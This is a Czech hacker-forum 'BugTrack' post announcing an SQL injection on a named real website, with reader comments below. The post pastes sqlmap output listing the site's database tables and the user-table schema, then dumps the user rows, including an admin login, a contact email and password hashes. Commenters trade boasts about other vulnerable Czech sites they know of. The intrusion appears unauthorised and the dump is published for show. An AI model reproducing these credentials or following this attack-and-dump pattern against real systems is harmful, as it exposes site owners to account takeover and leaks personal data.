petermadros.net - SQLi
BugTrack
| Zranitelny parametr: [link]
Hesla jsou zahashovany...
SQLMAP:
Database: palsign_peterm
[42 tables]
+-------------------------+
| articles |
| attachfiles_articles |
| attachfiles_events_ar |
| attachfiles_news |
| attachfiles_news_ar |
| attachfiles_news_de |
| attachfiles_news_es |
| attachfiles_news_fr |
| attachfiles_news_gr |
| attachfiles_news_he |
| attachfiles_news_it |
| attachfiles_news_nl |
| attachfiles_news_pt |
| base_backend_menu |
| base_mail |
| base_menu |
| base_module |
| base_page |
| base_settings |
| base_type |
| base_url |
| base_user |
| events |
| events_ar |
| happend_like |
| holy_day |
| language_specific_texts |
| news |
| news_ar |
| news_category |
| news_de |
| news_es |
| news_fr |
| news_gr |
| news_he |
| news_hy |
| news_it |
| news_nl |
| news_pt |
| newsletters |
| online |
| thumbnails |
+-------------------------+
Database: palsign_peterm
Table: base_user
[7 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| email | varchar(255) |
| enabled | enum('yes','no') |
| hash | varchar(255) |
| id | int(11) |
| login | varchar(255) |
| password | varchar(32) |
| type_id | int(11) |
+----------+------------------+
Table: base_user
[2 entries]
+----+---------+---------+----------+------
---------------+---------------------------
-------+
| id | type_id | hash | login | email | password |
+----+---------+---------+----------+------
---------------+---------------------------
-------+
| 2 | 1 | <blank> | admin | info@logicitech.com | 986dd88ddc987286028fa116427e7ede |
| 33 | 2 | <blank> | wwwpeter | <blank> | e5c5d1bf6a2a2245e7378f35668b1c09 |
+----+---------+---------+----------+------
---------------+---------------------------
-------+
(odpovědět) | |
|
|
| re: petermadros.net - SQLi | # |
| Chapu, ze to je bugtrack ... ale nemeli by tu byt alespon nejake "pekne ulovky" ? znam tolik SQLi na znamych serverech ceskych, ktere denne vyuzivaji tisice cechu a sdileji jejich obsah na FB, ale tady se stale objevuji pouze takove "lamoviny" :)
(odpovědět) | | CPANDAA | 78.102.216.* | 26.11.2014 17:37 |
|
|
|
| re: petermadros.net - SQLi | # |
| a proč se teda nepodělíš, když jich znáš spousty?
(odpovědět) | | Panther1 | 213.236.92.* | 2.12.2014 14:04 |
|
|
|
| re: petermadros.net - SQLi | # |
| Protoze 95% lidi zde jsou akorat nahodny lampy, tak jim to snad nebudu ulehčovat, ne ? ;)
(odpovědět) | | CPANDAA | 37.188.130.* | 6.12.2014 14:41 |
|
|
|
| re: petermadros.net - SQLi | # |
| CPANDO... Netvrdím, že je nějaký skvělý úlovek. Spíš to beru jako skromné začátky. Jak už jsi zmínil, ano je to bugtrack a tady to je naprosto plnohodnotné SQLi, které jsem tím pádem patří. Připouštím, že je nesmysl to ulehčovat začínajícím ,aby se posunuli dál a infiltrovali jsme děti... Ale tvůj komentář byl až přehnaně arogantní.
Jako závěr jen podotknu, že na otázku Panthera1 si vlastně neodpověděl... Jako odpověď já a Panther1 v bližší době očekáváme nějaké ty "pekne ulovky". :)
(odpovědět) | |
|
|
